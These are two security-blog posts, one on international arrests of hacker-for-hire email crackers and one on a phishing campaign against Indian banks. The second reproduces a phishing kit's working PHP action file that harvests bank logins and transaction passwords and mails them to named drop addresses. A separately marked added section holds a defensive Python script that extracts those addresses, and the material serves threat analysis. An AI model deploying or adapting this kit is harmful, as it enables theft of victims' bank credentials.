
Saturday, 25 January 2014

Unprecedented International Cybercrime Cooperation Nabs Email Hackers

Email Hacking in China, India, Romania

Yesterday we tweeted asking for more information on a statement we found in India's press regarding an email hacker charged in Pune. The article I cited, Pune techie held after FBI alert on hacking racket, reported:
The CBI on Friday arrested a 32-year-old techie from Pune after a tip-off from the Federal Bureau of Investigation (FBI) about a racket involving hacking of 900 e-mail accounts belonging to people from across the world, including Americans and Indians. [...] Following the FBI tip-off, the CBI carried out raids in Ghaziabad, Mumbai and Pune during which several professional hackers were rounded up. Tiwari was arrested and taken on transit remand to Delhi by the CBI team. His computers and other gadgets were seized. According to the CBI, the e-mail accounts of 171 Indians and more than 700 foreign nationals, including Americans, had been hacked. [...] The agency said the raids were part of a coordinated action involving the agencies of China, Romania, the US and India. This was the first time the CBI had tied up with international investigation agencies to launch an operation against cyber crime in India.
We were pleased to learn of the CBI's cooperation with the FBI on its first coordinated cybercrime effort, but were left puzzling over the statement about coordinated raids in India, Romania, China, and the US.

The confusion arose because the FBI had decided not to unseal the US cases related to these crimes until it received confirmation from its peers in India, Romania, and China that the others involved in the case had been arrested. Once that was concluded, we were able to find the original announcement of January 24, 2014, from the US Attorney's Office in the Central District of California, International Law Enforcement Efforts Result in Charges Around the World Against Operators and Customers of E-Mail Hacking Websites.

  • Mark Anthony Townsend, 45, of Cedarville, Arkansas, and
  • Joshua Alan Tabor, 29, of Prairie Grove, Arkansas, were charged with a felony violation for running "needpassword.com". Customers of their service would provide an email account and make payment via PayPal once the email password was obtained. More than 6,000 email accounts were hacked during this scheme.

Three additional US persons were charged, but with the lesser misdemeanor charges related to hiring a hacker (as opposed to the two above, who did the hacking themselves):

  • John Ross Jesensky, 30, of Northridge, California, paid $21,675 to a Chinese website to obtain email account passwords.
  • Laith Nona, 31, of Troy, Michigan, paid $1,081 to obtain email account passwords.
  • Arthur Drake, 55, of Bronx, New York, paid $1,011 to get email account passwords.

The Romanian DCCO (Direcţiei de Combatere a Criminalităţii Organizate, or Directorate for Combating Organized Crime), part of DIICOT, searched the residences of and arrested four individuals associated with the hacker-for-hire websites:

  • zhackgroup.com
  • spyhackgroup.com
  • rajahackers.com
  • clickhack.com
  • ghostgroup.org (since at least September 2006!)
  • e-mail-hackers.com

Romanian Email hacker, Guccifer

The Romanians report that these individuals broke into at least 1600 email accounts between February 2011 and October 2012.

Based so far only on the coincidence of timing, this blogger believes that this was the notorious "Guccifer", Marcel Lazar Lehel, who had previously received a suspended sentence of three years (February 8, 2012) for hacking into email accounts belonging to SRI director George Maior, former US Secretary of State Colin Powell, members of the Bush and Rockefeller families, and officials of the Obama administration. See for example the January 22, 2014 story in Romania's Nine O'Clock news, "Hacker 'Gucifer' caught in Arad" -- www.nineoclock.ro/hacker-“guccifer”-caught-in-arad/. Another story, from digi24.ro (via Google Translation), says:

[In addition to] SRI boss George Maior, George Bush, and Colin Powell, other victims of 'Guccifer' were actor Steve Martin; John Dean, former advisor to President Richard Nixon; actress Mariel Hemingway; three members of the House of Lords in the UK; Laura Manning Johnson, a former CIA analyst; George Roche, who was Secretary of the Air Force; and the president of MetLife (an insurance company).

In the earlier charges that resulted in the suspended sentence, Guccifer was also charged with accessing and making public photos from the Facebook pages and email accounts of many public officials in Romania.


Indian Email hacker, Amit Tiwari

The Central Bureau of Investigation in India arrested Amit Tiwari (who had previously been arrested for credit card fraud) for operating the websites www.hirehacker.net and www.anonymiti.com, through which at least 935 e-mail accounts were hacked between February 2011 and February 2013.

(Screen shot of HireHacker's homepage)

HireHacker.net had been a prolific advertiser of its services since 2007, creating many "blogs" (such as freelancehackers.wordpress.com) and posting questions on sites such as Yahoo Answers like "Can the Famous Internet Detectives at HireHacker.net really recover my cheating spouses email password?"


Chinese Email hacker, Ying Liu

The Ministry of Public Safety in China arrested Ying Liu (劉颖), AKA Brent Liu, for operating the website HireToHack.net. Liu was shown to have broken into at least 300 email accounts between January 2012 and March 2013.

Liu's website had its fifteen minutes of fame when it was featured in NYMag's story Hiring Hackers is Super Cheap. In that story from January 2012, one of two feuding Kuwaiti brothers (Bassam Alghanim being the billionaire of the two) hired Chinese hackers "for the price of a really good dinner" to break into his brother's email account. That story indicated that the hackers earned $200,000 in thirteen months by breaking into accounts. The story was also covered in the Wall Street Journal (which also has a video from Cassell Bryan-Low about the case), where it is suggested that the actual hacking may have been done via Invisible Hacking Group instead.

Ying Liu hosted his website, hiretohack.net, on the notorious Malaysian hosting platform, Piradius.net. Here are some screen shots of HireToHack.net that show how their system worked:

(Screen shots of HireToHack.net: Homepage, Menu of Services, Order Placement)
This is an amazing demonstration of international cooperation! I know I already said so, but for India's CBI, China's MPS, Romania's DCCO, and the FBI to cooperate on a single case is without precedent! A great sign, and a bad omen for cyber criminals!

Friday, 13 December 2013

Indian Banks targeted in multi-brand Phishing Attack

Malcovery Security's PhishIQ portal is a fascinating place to explore. This week I did a "Security Year in Review" webinar for an audience of our customers and friends, which was great fun to prepare! (We recorded the webinar for those who missed it; you can watch the recording here: State of Cybersecurity 2013/2014.) We reviewed the top security events of 2013, including some of the biggest hacks, the most prominent malware trends, and the successes that our security community (researchers, security companies, and law enforcement) had in responding to these challenges. I also shared my Ten Security Predictions for 2014. I've posted those to the LinkedIn group Enterprise Security Intelligence & Big Data and would love to hear your thoughts on them. Please consider joining our group and the conversation!

Malcovery Security 2014 Prediction #9: Phishing will hit hard in the emerging online banking markets in India and China

This prediction is based on a few things. The criminals in the phishing world are international. Most phishing victims are still in the United States at present, but that is because of the widespread availability of high-speed Internet and the prominence of online banking there. As China and India, which between them represent 36.5% of the world population, increasingly embrace online banking, the criminals of the world will turn their eyes to this newly online population, which does not have decades of experience with Internet safety issues behind it. I've already received some questions about this prediction, so I thought I would share some feedback on it by showing some of the visibility we have in PhishIQ into the issue.

The basic work, unfortunately, has already been done for preparing to attack the Indian banks. Phishing kits exist and are in circulation for at least forty Indian banks that we have seen at Malcovery just during the previous month!

e-Police India shared a phishing attack on their website at the beginning of November about a campaign imitating the Reserve Bank of India. In this attack, the spammers tell the victim to "Select Your Bank From the List Below to Complete Your OAC Registration Process". Malcovery has seen this kit several times, including a live version today on "thedelamere.co.uk".

For each of the icons on the list below, a full corresponding phishing site is offered. For some reason, the "western" banks on the list do NOT go to a phishing site, but link directly to the brand indicated. These "non-phish" entries (mostly western banks, but some Indian as well) include Barclays, Citibank, Deutsche Bank, Karnataka Bank, Karur Vysya Bank, Lakshmi Vilas Bank, RBS, Standard Chartered, and Tamilnad Mercantile Bank.

(Screen shot of phish on "thedelamere.co.uk")

The same set of phishing files recurs regularly in our phishing intelligence system, with more than 80 websites having been hacked to host these files.

Because Malcovery is REALLY good at recovering phishing kits, we were able to recover the criminals' email addresses in 15 of the 80 websites. akachi16akachi16@sify.com, akachiugonna@rediffmail.com, and akachiugonna@sify.com were found in 11 of those 15.

In November, the "action file" of these phish sent email to four email addresses, as shown above, and as observed by the investigators at e-Police.in. More recently, the "chizobamyluck@gmail.com" address has been excluded from the kit.

For example, for the phishing site:

The action file was:

<?php
// Kit "action file" as recovered (the criminals' own code, reproduced as found).
// Note the kit's own bug: $fromemail copies $ip before $ip has been assigned.
$fromemail = "$ip";
$ip = getenv("REMOTE_ADDR");

// Build the message body from the credentials posted by the victim
$message = "-----------------+ Andhra Bank Details +-----------------\n";
$message .= "User Id: " .$_POST['user']."\n";
$message .= "Password: " .$_POST['pass1']."\n";
$message .= "Transaction Password: " .$_POST['pass2']."\n";
$message .= "Mobile: " .$_POST['mobile']."\n";
$message .= "Client IP : $ip\n";
$message .= "-----------------+ Created in 2012 By DON PERO------------------\n";

// Drop addresses that receive the stolen credentials
$recipient = "akachi16akachi16@sify.com, akachiugonna@rediffmail.com,
akachiugonna@sify.com, chizobamyluck@gmail.com";
$subject = "Andhra $ip";
$headers = "From: admin@gameshack.org";
$headers .= $fromemail."\n";
$headers .= "MIME-Version: 1.0\n";

// Exfiltrate via mail(), then bounce the victim to the real bank site
if (mail($recipient,$subject,$message,$headers))
{ header("Location: http://andhrabank.com"); }
else
{ echo "ERROR! Please go back and try again."; }
?>
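Kits like the one above are what lets an analyst recover the drop addresses and count how many of the 80 sites reuse them. The following is an added example (not code from the post or from Malcovery) of that triage step: it pulls the drop addresses, harvested form fields and decoy redirect out of an action file and tallies address reuse across kits. The two kit sources are constructed samples in the style of the file shown above; only the drop addresses come from the post.

```python
import re
from collections import Counter

# Constructed sample action files in the style of the kit shown above.
# Drop addresses are the ones the post names; everything else is made up.
KIT_NOVEMBER = r'''<?php
$ip = getenv("REMOTE_ADDR");
$message .= "User Id: " .$_POST['user']."\n";
$message .= "Password: " .$_POST['pass1']."\n";
$message .= "Mobile: " .$_POST['mobile']."\n";
$recipient = "akachi16akachi16@sify.com, akachiugonna@rediffmail.com,
akachiugonna@sify.com, chizobamyluck@gmail.com";
$headers = "From: admin@gameshack.org";
if (mail($recipient,$subject,$message,$headers))
{ header("Location: http://andhrabank.com"); }
?>'''
# The later kit revision drops one address, as the post observed.
KIT_RECENT = KIT_NOVEMBER.replace(", chizobamyluck@gmail.com", "")

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
RECIPIENT_RE = re.compile(r'\$recipient\s*=\s*"([^"]*)"')
POST_FIELD_RE = re.compile(r"\$_POST\['([^']+)'\]")
REDIRECT_RE = re.compile(r'header\(\s*"Location:\s*([^"]+)"\s*\)')

def analyze_action_file(src):
    """Pull the exfiltration details out of one kit action file."""
    m = RECIPIENT_RE.search(src)
    # Only addresses inside $recipient count as drops; the From: header does not.
    drops = EMAIL_RE.findall(m.group(1)) if m else []
    redirect = REDIRECT_RE.search(src)
    return {
        "drops": drops,                          # where stolen logins are mailed
        "fields": POST_FIELD_RE.findall(src),    # form fields the kit harvests
        "redirect": redirect.group(1) if redirect else None,  # decoy page
        "mails_out": "mail(" in src,             # exfil channel is PHP mail()
    }

def recurring_drops(kit_sources):
    """Count, across kits, how many kits use each drop address."""
    counts = Counter()
    for src in kit_sources:
        counts.update(set(analyze_action_file(src)["drops"]))
    return counts

if __name__ == "__main__":
    for addr, n in recurring_drops([KIT_NOVEMBER, KIT_RECENT]).most_common():
        print(f"{n} kit(s): {addr}")
```

Run over a directory of recovered kits, the same tally is what turns "15 of 80 websites" into "3 addresses in 11 of those 15".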